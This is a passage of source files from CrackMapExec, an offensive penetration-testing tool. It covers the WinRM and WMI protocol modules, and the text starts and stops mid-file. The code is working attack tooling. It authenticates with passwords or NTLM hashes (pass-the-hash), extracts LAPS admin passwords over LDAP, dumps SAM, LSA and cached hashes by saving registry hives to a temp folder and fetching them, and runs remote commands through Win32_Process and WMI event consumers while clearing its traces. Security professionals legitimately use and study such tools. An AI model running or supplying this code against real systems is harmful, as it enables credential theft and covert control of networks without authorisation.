Client\n\nfrom impacket.smbconnection import SMBConnection\nfrom impacket.examples.secretsdump import LocalOperations, LSASecrets, SAMHashes\n\nfrom cme.config import process_secret\nfrom cme.connection import *\nfrom cme.helpers.bloodhound import add_user_bh\nfrom cme.protocols.ldap.laps import LDAPConnect, LAPSv2Extract\nfrom cme.logger import CMEAdapter\n\nclass winrm(connection):\n def __init__(self, args, db, host):\n self.domain = None\n self.server_os = None\n self.output_filename = None\n self.endpoint = None\n self.port = None\n self.hash = None\n self.lmhash = None\n self.nthash = None\n\n connection.__init__(self, args, db, host)\n\n def proto_logger(self):\n self.logger = CMEAdapter(\n extra={\n \"protocol\": \"WINRM\",\n \"host\": self.host,\n \"port\": self.args.port if self.args.port else 5985,\n \"hostname\": self.hostname,\n }\n )\n\n def enum_host_info(self):\n # smb no open, specify the domain\n if self.args.no_smb:\n self.domain = self.args.domain\n else:\n # try:\n smb_conn = SMBConnection(self.host, self.host, None, timeout=5)\n no_ntlm = False\n try:\n smb_conn.login(\"\", \"\")\n except BrokenPipeError:\n self.logger.fail(f\"Broken Pipe Error while attempting to login\")\n except Exception as e:\n if \"STATUS_NOT_SUPPORTED\" in str(e):\n # no ntlm supported\n no_ntlm = True\n pass\n\n self.domain = smb_conn.getServerDNSDomainName() if not no_ntlm else self.args.domain\n self.hostname = smb_conn.getServerName() if not no_ntlm else self.host\n self.server_os = smb_conn.getServerOS()\n if isinstance(self.server_os.lower(), bytes):\n self.server_os = self.server_os.decode(\"utf-8\")\n\n self.logger.extra[\"hostname\"] = self.hostname\n\n self.output_filename = os.path.expanduser(f\"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}\")\n\n try:\n smb_conn.logoff()\n except:\n pass\n # except Exception as e:\n # self.logger.fail(\n # f\"Error retrieving host domain: {e} specify one manually with the '-d' flag\"\n # )\n\n if self.args.domain:\n self.domain = self.args.domain\n\n if self.args.local_auth:\n self.domain = self.hostname\n\n if self.server_os is None:\n self.server_os = \"\"\n if self.domain is None:\n self.domain = \"\"\n\n self.db.add_host(self.host, self.port, self.hostname, self.domain, self.server_os)\n\n self.output_filename = os.path.expanduser(f\"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}\".replace(\":\", \"-\"))\n\n def laps_search(self, username, password, ntlm_hash, domain):\n ldapco = LDAPConnect(self.domain, \"389\", self.domain)\n\n if self.kerberos:\n if self.kdcHost is None:\n self.logger.fail(\"Add --kdcHost parameter to use laps with kerberos\")\n return False\n\n connection = ldapco.kerberos_login(\n domain,\n username[0] if username else \"\",\n password[0] if password else \"\",\n ntlm_hash[0] if ntlm_hash else \"\",\n kdcHost=self.kdcHost,\n aesKey=self.aesKey,\n )\n else:\n connection = ldapco.auth_login(\n domain,\n username[0] if username else \"\",\n password[0] if password else \"\",\n ntlm_hash[0] if ntlm_hash else \"\",\n )\n if not connection:\n self.logger.fail(\"LDAP connection failed with account {}\".format(username[0]))\n return False\n\n search_filter = \"(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=\" + self.hostname + \"))\"\n attributes = [\n \"msLAPS-EncryptedPassword\",\n \"msLAPS-Password\",\n \"ms-MCS-AdmPwd\",\n \"sAMAccountName\",\n ]\n results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)\n\n msMCSAdmPwd = \"\"\n sAMAccountName = \"\"\n username_laps = \"\"\n\n from impacket.ldap import ldapasn1 as ldapasn1_impacket\n\n results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)]\n if len(results) != 0:\n for host in results:\n values = {str(attr[\"type\"]).lower(): attr[\"vals\"][0] for attr in host[\"attributes\"]}\n if \"mslaps-encryptedpassword\" in values:\n from json import loads\n msMCSAdmPwd = values[\"mslaps-encryptedpassword\"]\n d = LAPSv2Extract(\n bytes(msMCSAdmPwd),\n username[0] if username else \"\",\n password[0] if password else \"\",\n domain,\n ntlm_hash[0] if ntlm_hash else \"\",\n self.args.kerberos,\n self.args.kdcHost,\n 339)\n data = d.run()\n r = loads(data)\n msMCSAdmPwd = r[\"p\"]\n username_laps = r[\"n\"]\n elif \"mslaps-password\" in values:\n from json import loads\n r = loads(str(values[\"mslaps-password\"]))\n msMCSAdmPwd = r[\"p\"]\n username_laps = r[\"n\"]\n elif \"ms-mcs-admpwd\" in values:\n msMCSAdmPwd = str(values[\"ms-mcs-admpwd\"])\n else:\n self.logger.fail(\"No result found with attribute ms-MCS-AdmPwd or\" \" msLAPS-Password\")\n self.logger.debug(\"Host: {:<20} Password: {} {}\".format(sAMAccountName, msMCSAdmPwd, self.hostname))\n else:\n self.logger.fail(\"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS\" \" property for {}\".format(self.hostname))\n return False\n\n self.username = self.args.laps if not username_laps else username_laps\n self.password = msMCSAdmPwd\n\n if msMCSAdmPwd == \"\":\n self.logger.fail(\"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS\" \" property for {}\".format(self.hostname))\n return False\n if ntlm_hash:\n hash_ntlm = hashlib.new(\"md4\", msMCSAdmPwd.encode(\"utf-16le\")).digest()\n self.hash = binascii.hexlify(hash_ntlm).decode()\n\n self.domain = self.hostname\n return True\n\n def print_host_info(self):\n if self.args.domain:\n self.logger.extra[\"protocol\"] = \"HTTP\"\n self.logger.display(self.endpoint)\n else:\n self.logger.extra[\"protocol\"] = \"SMB\"\n self.logger.display(f\"{self.server_os} (name:{self.hostname}) (domain:{self.domain})\")\n self.logger.extra[\"protocol\"] = \"HTTP\"\n self.logger.display(self.endpoint)\n\n if self.args.laps:\n return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain)\n return True\n\n def create_conn_obj(self):\n endpoints = [\n f\"https://{self.host}:{self.args.port if self.args.port else 5986}/wsman\",\n f\"http://{self.host}:{self.args.port if self.args.port else 5985}/wsman\",\n ]\n\n for url in endpoints:\n try:\n self.logger.debug(f\"winrm create_conn_obj() - Requesting URL: {url}\")\n res = requests.post(url, verify=False, timeout=self.args.http_timeout)\n self.logger.debug(\"winrm create_conn_obj() - Received response code:\" f\" {res.status_code}\")\n self.endpoint = url\n if self.endpoint.startswith(\"https://\"):\n self.logger.extra[\"port\"] = self.args.port if self.args.port else 5986\n else:\n self.logger.extra[\"port\"] = self.args.port if self.args.port else 5985\n return True\n except requests.exceptions.Timeout as e:\n self.logger.info(f\"Connection Timed out to WinRM service: {e}\")\n except requests.exceptions.ConnectionError as e:\n if \"Max retries exceeded with url\" in str(e):\n self.logger.info(f\"Connection Timeout to WinRM service (max retries exceeded)\")\n else:\n self.logger.info(f\"Other ConnectionError to WinRM service: {e}\")\n return False\n\n def plaintext_login(self, domain, username, password):\n try:\n from urllib3.connectionpool import log\n\n # log.addFilter(SuppressFilter())\n if not self.args.laps:\n self.password = password\n self.username = username\n self.domain = domain\n if self.args.ssl and self.args.ignore_ssl_cert:\n self.conn = Client(\n self.host,\n auth=\"ntlm\",\n username=f\"{domain}\\\\{self.username}\",\n password=self.password,\n ssl=True,\n cert_validation=False,\n )\n elif self.args.ssl:\n self.conn = Client(\n self.host,\n auth=\"ntlm\",\n username=f\"{domain}\\\\{self.username}\",\n password=self.password,\n ssl=True,\n )\n else:\n self.conn = Client(\n self.host,\n auth=\"ntlm\",\n username=f\"{domain}\\\\{self.username}\",\n password=self.password,\n ssl=False,\n )\n\n # TO DO: right now we're just running the hostname command to make the winrm library auth to the server\n # we could just authenticate without running a command :) (probably)\n self.conn.execute_ps(\"hostname\")\n self.admin_privs = True\n self.logger.success(f\"{self.domain}\\\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}\")\n\n self.logger.debug(f\"Adding credential: {domain}/{self.username}:{self.password}\")\n self.db.add_credential(\"plaintext\", domain, self.username, self.password)\n # TODO: when we can easily get the host_id via RETURNING statements, readd this in\n # host_id = self.db.get_hosts(self.host)[0].id\n # self.db.add_loggedin_relation(user_id, host_id)\n\n if self.admin_privs:\n self.logger.debug(f\"Inside admin privs\")\n self.db.add_admin_user(\"plaintext\", domain, self.username, self.password, self.host) # , user_id=user_id)\n\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n except Exception as e:\n if \"with ntlm\" in str(e):\n self.logger.fail(f\"{self.domain}\\\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}\")\n else:\n self.logger.fail(f\"{self.domain}\\\\{self.username}:{process_secret(self.password)} {self.mark_pwned()} '{e}'\")\n\n return False\n\n def hash_login(self, domain, username, ntlm_hash):\n try:\n # from urllib3.connectionpool import log\n\n # log.addFilter(SuppressFilter())\n lmhash = \"00000000000000000000000000000000:\"\n nthash = \"\"\n\n if not self.args.laps:\n self.username = username\n # This checks to see if we didn't provide the LM Hash\n if ntlm_hash.find(\":\") != -1:\n lmhash, nthash = ntlm_hash.split(\":\")\n else:\n nthash = ntlm_hash\n ntlm_hash = lmhash + nthash\n if lmhash:\n self.lmhash = lmhash\n if nthash:\n self.nthash = nthash\n else:\n nthash = self.hash\n\n self.domain = domain\n if self.args.ssl and self.args.ignore_ssl_cert:\n self.conn = Client(\n self.host,\n auth=\"ntlm\",\n username=f\"{self.domain}\\\\{self.username}\",\n password=lmhash + nthash,\n ssl=True,\n cert_validation=False,\n )\n elif self.args.ssl:\n self.conn = Client(\n self.host,\n auth=\"ntlm\",\n username=f\"{self.domain}\\\\{self.username}\",\n password=lmhash + nthash,\n ssl=True,\n )\n else:\n self.conn = Client(\n self.host,\n auth=\"ntlm\",\n username=f\"{self.domain}\\\\{self.username}\",\n password=lmhash + nthash,\n ssl=False,\n )\n\n # TO DO: right now we're just running the hostname command to make the winrm library auth to the server\n # we could just authenticate without running a command :) (probably)\n self.conn.execute_ps(\"hostname\")\n self.admin_privs = True\n self.logger.success(f\"{self.domain}\\\\{self.username}:{process_secret(nthash)} {self.mark_pwned()}\")\n self.db.add_credential(\"hash\", domain, self.username, nthash)\n\n if self.admin_privs:\n self.db.add_admin_user(\"hash\", domain, self.username, nthash, self.host)\n\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n return True\n\n except Exception as e:\n if \"with ntlm\" in str(e):\n self.logger.fail(f\"{self.domain}\\\\{self.username}:{process_secret(nthash)}\")\n else:\n self.logger.fail(f\"{self.domain}\\\\{self.username}:{process_secret(nthash)} '{e}'\")\n return False\n\n def execute(self, payload=None, get_output=False):\n try:\n r = self.conn.execute_cmd(self.args.execute, encoding=self.args.codec)\n except:\n self.logger.info(\"Cannot execute command, probably because user is not local admin, but\" \" powershell command should be ok!\")\n r = self.conn.execute_ps(self.args.execute)\n self.logger.success(\"Executed command\")\n buf = StringIO(r[0]).readlines()\n for line in buf:\n self.logger.highlight(line.strip())\n\n\n def ps_execute(self, payload=None, get_output=False):\n r = self.conn.execute_ps(self.args.ps_execute)\n self.logger.success(\"Executed command\")\n buf = StringIO(r[0]).readlines()\n for line in buf:\n self.logger.highlight(line.strip())\n\n def sam(self):\n self.conn.execute_cmd(\"reg save HKLM\\SAM C:\\\\windows\\\\temp\\\\SAM && reg save HKLM\\SYSTEM\" \" C:\\\\windows\\\\temp\\\\SYSTEM\")\n self.conn.fetch(\"C:\\\\windows\\\\temp\\\\SAM\", self.output_filename + \".sam\")\n self.conn.fetch(\"C:\\\\windows\\\\temp\\\\SYSTEM\", self.output_filename + \".system\")\n self.conn.execute_cmd(\"del C:\\\\windows\\\\temp\\\\SAM && del C:\\\\windows\\\\temp\\\\SYSTEM\")\n\n local_operations = LocalOperations(f\"{self.output_filename}.system\")\n boot_key = local_operations.getBootKey()\n SAM = SAMHashes(\n f\"{self.output_filename}.sam\",\n boot_key,\n isRemote=None,\n perSecretCallback=lambda secret: self.logger.highlight(secret),\n )\n SAM.dump()\n SAM.export(f\"{self.output_filename}.sam\")\n\n def lsa(self):\n self.conn.execute_cmd(\"reg save HKLM\\SECURITY C:\\\\windows\\\\temp\\\\SECURITY && reg save HKLM\\SYSTEM\" \" C:\\\\windows\\\\temp\\\\SYSTEM\")\n self.conn.fetch(\"C:\\\\windows\\\\temp\\\\SECURITY\", f\"{self.output_filename}.security\")\n self.conn.fetch(\"C:\\\\windows\\\\temp\\\\SYSTEM\", f\"{self.output_filename}.system\")\n self.conn.execute_cmd(\"del C:\\\\windows\\\\temp\\\\SYSTEM && del C:\\\\windows\\\\temp\\\\SECURITY\")\n\n local_operations = LocalOperations(f\"{self.output_filename}.system\")\n boot_key = local_operations.getBootKey()\n LSA = LSASecrets(\n f\"{self.output_filename}.security\",\n boot_key,\n None,\n isRemote=None,\n perSecretCallback=lambda secret_type, secret: self.logger.highlight(secret),\n )\n LSA.dumpCachedHashes()\n LSA.dumpSecrets()\n" }, { "path": "cme/protocols/wmi/__init__.py", "content": "\n" }, { "path": "cme/protocols/wmi/database.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy import MetaData, Table\nfrom sqlalchemy.exc import (\n IllegalStateChangeError,\n NoInspectionAvailable,\n NoSuchTableError,\n)\nfrom cme.logger import cme_logger\n\n\nclass database:\n def __init__(self, db_engine):\n self.CredentialsTable = None\n self.HostsTable = None\n\n self.db_engine = db_engine\n self.db_path = self.db_engine.url.database\n self.protocol = Path(self.db_path).stem.upper()\n self.metadata = MetaData()\n self.reflect_tables()\n session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)\n\n Session = scoped_session(session_factory)\n # this is still named \"conn\" when it is the session object; TODO: rename\n self.conn = Session()\n\n @staticmethod\n def db_schema(db_conn):\n db_conn.execute(\n \"\"\"CREATE TABLE \"credentials\" (\n \"id\" integer PRIMARY KEY,\n \"username\" text,\n \"password\" text\n )\"\"\"\n )\n\n db_conn.execute(\n \"\"\"CREATE TABLE \"hosts\" (\n \"id\" integer PRIMARY KEY,\n \"ip\" text,\n \"hostname\" text,\n \"port\" integer\n )\"\"\"\n )\n\n def reflect_tables(self):\n with self.db_engine.connect() as conn:\n try:\n self.CredentialsTable = Table(\"credentials\", self.metadata, autoload_with=self.db_engine)\n self.HostsTable = Table(\"hosts\", self.metadata, autoload_with=self.db_engine)\n except (NoInspectionAvailable, NoSuchTableError):\n print(\n f\"\"\"\n [-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch\n [-] This is probably because a newer version of CME is being ran on an old DB schema\n [-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)\n [-] Then remove the CME {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB\"\"\"\n )\n exit()\n\n def shutdown_db(self):\n try:\n self.conn.close()\n # due to the async nature of CME, sometimes session state is a bit messy and this will throw:\n # Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and\n # this would cause an unexpected state change to \n except IllegalStateChangeError as e:\n cme_logger.debug(f\"Error while closing session db object: {e}\")\n\n def clear_database(self):\n for table in self.metadata.sorted_tables:\n self.conn.execute(table.delete())\n" }, { "path": "cme/protocols/wmi/db_navigator.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(DatabaseNavigator):\n def do_clear_database(self, line):\n if input(\"This will destroy all data in the current database, are you SURE you want to run this? (y/n): \") == \"y\":\n self.db.clear_database()\n\n def help_clear_database(self):\n help_string = \"\"\"\n clear_database\n THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE\n YOU CANNOT UNDO THIS COMMAND\n \"\"\"\n print_help(help_string)\n" }, { "path": "cme/protocols/wmi/proto_args.py", "content": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n wmi_parser = parser.add_parser('wmi', help=\"own stuff using WMI\", parents=[std_parser, module_parser], conflict_handler='resolve')\n wmi_parser.add_argument(\"-H\", '--hash', metavar=\"HASH\", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')\n wmi_parser.add_argument(\"--port\", type=int, choices={135}, default=135, help=\"WMI port (default: 135)\")\n wmi_parser.add_argument(\"--rpc-timeout\", help=\"RPC/DCOM(WMI) connection timeout, default is %(default)s secondes\", type=int, default=2)\n\n # For domain options\n dgroup = wmi_parser.add_mutually_exclusive_group()\n domain_arg = dgroup.add_argument(\"-d\", metavar=\"DOMAIN\", dest='domain', default=None, type=str, help=\"Domain to authenticate to\")\n dgroup.add_argument(\"--local-auth\", action='store_true', help='Authenticate locally to each target')\n\n egroup = wmi_parser.add_argument_group(\"Mapping/Enumeration\", \"Options for Mapping/Enumerating\")\n egroup.add_argument(\"--wmi\", metavar='QUERY', dest='wmi',type=str, help='Issues the specified WMI query')\n egroup.add_argument(\"--wmi-namespace\", metavar='NAMESPACE', type=str, default='root\\\\cimv2', help='WMI Namespace (default: root\\\\cimv2)')\n\n cgroup = wmi_parser.add_argument_group(\"Command Execution\", \"Options for executing commands\")\n cgroup.add_argument(\"--no-output\", action=\"store_true\", help=\"do not retrieve command output\")\n cgroup.add_argument(\"-x\", metavar='COMMAND', dest='execute', type=str, help='Creates a new cmd process and executes the specified command with output')\n cgroup.add_argument(\"--exec-method\", choices={\"wmiexec\", \"wmiexec-event\"}, default=\"wmiexec\",\n help=\"method to execute the command. (default: wmiexec). \"\n \"[wmiexec (win32_process + StdRegProv)]: get command results over registry instead of using smb connection. \"\n \"[wmiexec-event (T1546.003)]: this method is not very stable, highly recommend use this method in single host, \"\n \"using on multiple hosts may crash (just try again if it crashed).\")\n cgroup.add_argument(\"--interval-time\", default=5 ,metavar='INTERVAL_TIME', dest='interval_time', type=int, help='Set interval time(seconds) when executing command, unrecommend set it lower than 5')\n cgroup.add_argument(\"--codec\", default=\"utf-8\",\n help=\"Set encoding used (codec) from the target's output (default \"\n \"\\\"utf-8\\\"). If errors are detected, run chcp.com at the target, \"\n \"map the result with \"\n \"https://docs.python.org/3/library/codecs.html#standard-encodings and then execute \"\n \"again with --codec and the corresponding codec\")\n return parser\n\ndef get_conditional_action(baseAction):\n class ConditionalAction(baseAction):\n def __init__(self, option_strings, dest, **kwargs):\n x = kwargs.pop('make_required', [])\n super(ConditionalAction, self).__init__(option_strings, dest, **kwargs)\n self.make_required = x\n\n def __call__(self, parser, namespace, values, option_string=None):\n for x in self.make_required:\n x.required = True\n super(ConditionalAction, self).__call__(parser, namespace, values, option_string)\n\n return ConditionalAction" }, { "path": "cme/protocols/wmi/wmiexec.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n#\n# Author: xiaolichan\n# Link: https://github.com/XiaoliChan/wmiexec-RegOut/blob/main/wmiexec-regOut.py\n# Note: windows version under NT6 not working with this command execution way\n# https://github.com/XiaoliChan/wmiexec-RegOut/blob/main/wmiexec-reg-sch-UnderNT6-wip.py -- WIP\n# \n# Description: \n# For more details, please check out my repository.\n# https://github.com/XiaoliChan/wmiexec-RegOut\n#\n# Workflow:\n# Stage 1:\n# cmd.exe /Q /c {command} > C:\\windows\\temp\\{random}.txt (aka command results)\n# \n# powershell convert the command results into base64, and save it into C:\\windows\\temp\\{random2}.txt (now the command results was base64 encoded)\n# \n# Create registry path: HKLM:\\Software\\Classes\\hello, then add C:\\windows\\temp\\{random2}.txt into HKLM:\\Software\\Classes\\hello\\{NewKey}\n#\n# Remove anythings which in C:\\windows\\temp\\\n#\n# Stage 2:\n# WQL query the HKLM:\\Software\\Classes\\hello\\{NewKey} and get results, after the results(base64 strings) retrieved, removed\n\nimport time\nimport uuid\nimport base64\n\nfrom cme.helpers.misc import gen_random_string\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection\nfrom impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login\n\nclass WMIEXEC:\n def __init__(self, host, username, password, domain, lmhash, nthash, doKerberos, kdcHost, aesKey, logger, interval_time, codec):\n self.__host = host\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = lmhash\n self.__nthash = nthash\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n self.__aesKey = aesKey\n self.logger = logger\n self.__interval_time = interval_time\n self.__registry_Path = \"\"\n self.__outputBuffer = \"\"\n self.__retOutput = True\n\n self.__shell = 'cmd.exe /Q /c '\n #self.__pwsh = 'powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc '\n #self.__pwsh = 'powershell.exe -Enc '\n self.__pwd = str('C:\\\\')\n self.__codec = codec\n\n self.__dcom = DCOMConnection(self.__host, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, oxidResolver=True, doKerberos=self.__doKerberos ,kdcHost=self.__kdcHost, aesKey=self.__aesKey)\n iInterface = self.__dcom.CoCreateInstanceEx(CLSID_WbemLevel1Login, IID_IWbemLevel1Login)\n iWbemLevel1Login = IWbemLevel1Login(iInterface)\n self.__iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)\n iWbemLevel1Login.RemRelease()\n self.__win32Process, _ = self.__iWbemServices.GetObject('Win32_Process')\n \n def execute(self, command, output=False):\n self.__retOutput = output\n if self.__retOutput:\n self.execute_WithOutput(command)\n else:\n command = self.__shell + command\n self.execute_remote(command)\n\n self.__dcom.disconnect()\n\n return self.__outputBuffer\n\n def execute_remote(self, command):\n self.logger.info(f\"Executing command: {command}\")\n try:\n self.__win32Process.Create(command, self.__pwd, None)\n except Exception as e:\n self.logger.error((str(e)))\n\n def execute_WithOutput(self, command):\n result_output = f\"C:\\\\windows\\\\temp\\\\{str(uuid.uuid4())}.txt\"\n result_output_b64 = f\"C:\\\\windows\\\\temp\\\\{str(uuid.uuid4())}.txt\"\n keyName = str(uuid.uuid4())\n self.__registry_Path = f\"Software\\\\Classes\\\\{gen_random_string(6)}\"\n\n command = fr'''{self.__shell} {command} 1> {result_output} 2>&1 && certutil -encodehex -f {result_output} {result_output_b64} 0x40000001 && for /F \"usebackq\" %G in (\"{result_output_b64}\") do reg add HKLM\\{self.__registry_Path} /v {keyName} /t REG_SZ /d \"%G\" /f && del /q /f /s {result_output} {result_output_b64}'''\n\n self.execute_remote(command)\n self.logger.info(\"Waiting {}s for command completely executed.\".format(self.__interval_time))\n time.sleep(self.__interval_time)\n\n self.queryRegistry(keyName)\n\n def queryRegistry(self, keyName):\n try:\n self.logger.debug(f\"Querying registry key: HKLM\\\\{self.__registry_Path}\")\n descriptor, _ = self.__iWbemServices.GetObject('StdRegProv')\n descriptor = descriptor.SpawnInstance()\n retVal = descriptor.GetStringValue(2147483650, self.__registry_Path, keyName)\n self.__outputBuffer = base64.b64decode(retVal.sValue).decode(self.__codec, errors='replace').rstrip('\\r\\n')\n except Exception as e:\n self.logger.fail(f'WMIEXEC: Get output file error, maybe command not executed successfully or got detected by AV software, please increase the interval time of command execution with \"--interval-time\" option. If it\\'s still failing maybe something is blocking the schedule job in vbscript, try another exec method')\n \n try:\n self.logger.debug(f\"Removing temporary registry path: HKLM\\\\{self.__registry_Path}\")\n retVal = descriptor.DeleteKey(2147483650, self.__registry_Path)\n except Exception as e:\n self.logger.debug(f\"Target: {self.__host} removing temporary registry path error: {str(e)}\")" }, { "path": "cme/protocols/wmi/wmiexec_event.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n#\n# Author: xiaolichan\n# Link: https://github.com/XiaoliChan/wmiexec-Pro\n# Note: windows version under NT6 not working with this command execution way, it need Win32_ScheduledJob.\n# https://github.com/XiaoliChan/wmiexec-Pro/blob/main/lib/modules/exec_command.py\n# \n# Description: \n# For more details, please check out my repository.\n# https://github.com/XiaoliChan/wmiexec-Pro/blob/main/lib/modules/exec_command.py\n#\n# Workflow:\n# Stage 1:\n# Generate vbs with command.\n#\n# Stage 2:\n# Execute vbs via wmi event, the vbs will write back the command result into new instance in ActiveScriptEventConsumer.Name=\"{command_ResultInstance}\"\n#\n# Stage 3:\n# Get result from reading wmi object ActiveScriptEventConsumer.Name=\"{command_ResultInstance}\"\n#\n# Stage 4:\n# Remove everythings in wmi object\n\nimport time\nimport uuid\nimport base64\nimport sys\n\nfrom io import StringIO\nfrom cme.helpers.powershell import get_ps_script\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection\nfrom impacket.dcerpc.v5.dcom.wmi import WBEMSTATUS\nfrom impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login, WBEMSTATUS\n\nclass WMIEXEC_EVENT:\n def __init__(self, host, username, password, domain, lmhash, nthash, doKerberos, kdcHost, aesKey, logger, interval_time, codec):\n self.__host = host\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = lmhash\n self.__nthash = nthash\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n self.__aesKey = aesKey\n self.__outputBuffer = \"\"\n self.__retOutput = True\n \n self.logger = logger\n self.__interval_time = interval_time\n self.__codec = codec\n self.__instanceID = f\"windows-object-{str(uuid.uuid4())}\"\n self.__instanceID_StoreResult = f\"windows-object-{str(uuid.uuid4())}\"\n\n self.__dcom = DCOMConnection(self.__host, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, oxidResolver=True, doKerberos=self.__doKerberos ,kdcHost=self.__kdcHost, aesKey=self.__aesKey)\n iInterface = self.__dcom.CoCreateInstanceEx(CLSID_WbemLevel1Login, IID_IWbemLevel1Login)\n iWbemLevel1Login = IWbemLevel1Login(iInterface)\n self.__iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL)\n iWbemLevel1Login.RemRelease()\n\n def execute(self, command, output=False):\n if \"'\" in command: command = command.replace(\"'\",r'\"')\n self.__retOutput = output\n self.execute_handler(command)\n\n self.__dcom.disconnect()\n\n return self.__outputBuffer\n\n def execute_remote(self, command):\n self.logger.info(f\"Executing command: {command}\")\n try:\n self.execute_vbs(self.process_vbs(command))\n except Exception as e:\n self.logger.error((str(e)))\n\n def execute_handler(self, command):\n # Generate vbsript and execute it\n self.logger.debug(f\"{self.__host}: Execute command via wmi event, job instance id: {self.__instanceID}, command result instance id: {self.__instanceID_StoreResult}\")\n self.execute_remote(command)\n \n # Get command results\n self.logger.info(\"Waiting {}s for command completely executed.\".format(self.__interval_time))\n time.sleep(self.__interval_time)\n\n if self.__retOutput:\n self.get_CommandResult()\n\n # Clean up\n self.remove_Instance()\n\n def process_vbs(self, command):\n schedule_taskname = str(uuid.uuid4())\n # Link: https://github.com/XiaoliChan/wmiexec-Pro/blob/main/lib/vbscripts/Exec-Command-WithOutput.vbs\n # The reason why need to encode command to base64:\n # because if some special charters in command like chinese,\n # when wmi doing put instance, it will throwing a exception about data type error (lantin-1),\n # but we can base64 encode it and submit the data without spcial charters to avoid it.\n if self.__retOutput:\n output_file = f\"{str(uuid.uuid4())}.txt\"\n with open(get_ps_script(\"wmiexec_event_vbscripts/Exec_Command_WithOutput.vbs\"), \"r\") as vbs_file:\n vbs = vbs_file.read()\n vbs = vbs.replace(\"REPLACE_ME_BASE64_COMMAND\", base64.b64encode(command.encode()).decode())\n vbs = vbs.replace(\"REPLACE_ME_OUTPUT_FILE\", output_file)\n vbs = vbs.replace(\"REPLACE_ME_INSTANCEID\", self.__instanceID_StoreResult)\n vbs = vbs.replace(\"REPLACE_ME_TEMP_TASKNAME\", schedule_taskname)\n else:\n # From wmihacker\n # Link: https://github.com/rootclay/WMIHACKER/blob/master/WMIHACKER_0.6.vbs\n with open(get_ps_script(\"wmiexec_event_vbscripts/Exec_Command_Silent.vbs\"), \"r\") as vbs_file:\n vbs = vbs_file.read()\n vbs = vbs.replace(\"REPLACE_ME_BASE64_COMMAND\", base64.b64encode(command.encode()).decode())\n vbs = vbs.replace(\"REPLACE_ME_TEMP_TASKNAME\", schedule_taskname)\n return vbs\n\n def checkError(self, banner, call_status):\n if call_status != 0:\n try:\n error_name = WBEMSTATUS.enumItems(call_status).name\n except ValueError:\n error_name = 'Unknown'\n self.logger.debug(\"{} - ERROR: {} (0x{:08x})\".format(banner, error_name, call_status))\n else:\n self.logger.debug(f\"{banner} - OK\")\n\n def execute_vbs(self, vbs_content):\n # Copy from wmipersist.py\n # Install ActiveScriptEventConsumer\n activeScript, _ = self.__iWbemServices.GetObject('ActiveScriptEventConsumer')\n activeScript = activeScript.SpawnInstance()\n activeScript.Name = self.__instanceID\n activeScript.ScriptingEngine = 'VBScript'\n activeScript.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]\n activeScript.ScriptText = vbs_content\n # Don't output impacket default verbose\n current=sys.stdout\n sys.stdout = StringIO()\n resp = self.__iWbemServices.PutInstance(activeScript.marshalMe())\n sys.stdout = current\n self.checkError(f'Adding ActiveScriptEventConsumer.Name=\"{self.__instanceID}\"', resp.GetCallStatus(0) & 0xffffffff)\n\n # Timer means the amount of milliseconds after the script will be triggered, hard coding to 1 second it in this case.\n wmiTimer, _ = self.__iWbemServices.GetObject('__IntervalTimerInstruction')\n wmiTimer = wmiTimer.SpawnInstance()\n wmiTimer.TimerId = self.__instanceID\n wmiTimer.IntervalBetweenEvents = 1000\n #wmiTimer.SkipIfPassed = False\n # Don't output verbose\n current=sys.stdout\n sys.stdout = StringIO()\n resp = self.__iWbemServices.PutInstance(wmiTimer.marshalMe())\n sys.stdout = current\n self.checkError(f'Adding 